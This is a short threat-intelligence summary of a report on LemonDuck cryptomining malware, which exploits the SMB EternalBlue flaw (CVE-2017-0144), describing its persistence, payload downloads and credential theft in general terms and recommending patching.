LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits
Essential information
- Published
- 14/10/2024 10:41
- Modified
- 14/10/2024 11:14
- Tags
- 2024-10-14 CVE-2017-0144 credential-theft cryptomining lemonduck malicious scripts network manipulation persistence
- Related entities
- 2 vulnerabilities (cve), 8 observables, 1 intrusion sets (apt), 7 techniques (mitre), 1 malware
Description
This report details the tactics and techniques employed by the LemonDuck cryptomining malware, which exploits the SMB service by leveraging the EternalBlue vulnerability (CVE-2017-0144). After gaining initial access through brute-force attacks, the malware creates malicious files, disables security measures, manipulates network settings, and sets up scheduled tasks to ensure persistence. It also downloads additional payloads from remote URLs and utilizes tools like Mimikatz for credential theft. The analysis provides insights into the malware's infection strategy and highlights the importance of keeping systems updated to mitigate such threats.